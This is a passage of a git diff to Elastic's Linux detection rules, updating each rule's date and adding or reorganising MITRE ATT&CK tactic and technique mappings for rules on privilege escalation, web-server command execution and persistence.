+reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" @@ -124,3 +129,21 @@ reference = "https://attack.mitre.org/techniques/T1136/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index 9bf48a74d57..96ac48f1a38 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -221,6 +221,21 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -238,3 +253,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index bd1fd7cbd10..6306b468fc7 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -223,3 +223,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml index 1c274eb2f45..72aa174c920 100644 --- a/rules/linux/persistence_web_server_sus_destination_port.toml +++ b/rules/linux/persistence_web_server_sus_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,11 +114,6 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10. [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -129,14 +124,14 @@ id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -147,15 +142,25 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml index e8c298819bd..cda9c6e04cf 100644 --- a/rules/linux/persistence_web_server_unusual_command_execution.toml +++ b/rules/linux/persistence_web_server_unusual_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,6 +143,18 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/linux/persistence_xdg_autostart_netcon.toml b/rules/linux/persistence_xdg_autostart_netcon.toml index d51e8ec2ee0..a7011c3c5a7 100644 --- a/rules/linux/persistence_xdg_autostart_netcon.toml +++ b/rules/linux/persistence_xdg_autostart_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,3 +151,21 @@ reference = "https://attack.mitre.org/techniques/T1547/013/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml index cfc4377bf4d..57be4ef8581 100644 --- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,6 +154,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml index bfc29e3bbe6..111a373cf05 100644 --- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml +++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,3 +138,21 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_container_util_misconfiguration.toml b/rules/linux/privilege_escalation_container_util_misconfiguration.toml index e7e9e00b5ab..ea17cb60ff5 100644 --- a/rules/linux/privilege_escalation_container_util_misconfiguration.toml +++ b/rules/linux/privilege_escalation_container_util_misconfiguration.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml index 1e3ddd54ee1..297133b5d36 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,6 +119,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml index cbb17f3d837..173b44030b1 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,7 +118,35 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml b/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml index b3c53534dd7..0ad192c73af 100644 --- a/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml +++ b/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/30" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,6 +142,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml index d6e99458e84..485d724da6d 100644 --- a/rules/linux/privilege_escalation_dac_permissions.toml +++ b/rules/linux/privilege_escalation_dac_permissions.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,33 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml b/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml index 94a0637e997..22e78454d57 100644 --- a/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml +++ b/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,3 +113,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_docker_release_file_creation.toml b/rules/linux/privilege_escalation_docker_release_file_creation.toml index 13bfdf602c9..e919be74c9a 100644 --- a/rules/linux/privilege_escalation_docker_release_file_creation.toml +++ b/rules/linux/privilege_escalation_docker_release_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,6 +78,11 @@ not process.executable in ("/usr/bin/podman", "/sbin/sos", "/sbin/sosreport", "/ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1611" name = "Escape to Host" @@ -87,3 +92,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml index 163762f1cb3..4d7848f815a 100644 --- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml +++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,23 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml index d9f136f68e5..8de88108c11 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,24 +104,28 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml index b03edb7d5b6..8e85be5293b 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,53 +106,72 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.008" +name = "Ptrace System Calls" +reference = "https://attack.mitre.org/techniques/T1055/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml index 5c695d128cc..f82fe71622b 100644 --- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml +++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,31 +102,41 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.013" name = "KernelCallbackTable" reference = "https://attack.mitre.org/techniques/T1574/013/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index 046ac09030c..88dcfc8a949 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,41 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml index af3b13bbbe3..7b6c41b148e 100644 --- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml +++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -144,3 +149,29 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml index e2af607fc77..247f7568715 100644 --- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml +++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,6 +153,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [[rule.threat.technique]] id = "T1601" name = "Modify System Image" diff --git a/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml b/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml index 7f703f3cf39..8a26e54fea9 100644 --- a/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml +++ b/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,14 +114,23 @@ CVE-2023-4911 exploits a buffer overflow in the GNU C Library's dynamic loader, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_overlayfs_local_privesc.toml b/rules/linux/privilege_escalation_overlayfs_local_privesc.toml index c7b540738b2..fa85b1fcacc 100644 --- a/rules/linux/privilege_escalation_overlayfs_local_privesc.toml +++ b/rules/linux/privilege_escalation_overlayfs_local_privesc.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,14 +105,18 @@ OverlayFS is a union filesystem used in Linux environments to overlay one filesy [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 9df3d417f82..bbffa62b3bf 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -2,7 +2,7 @@ 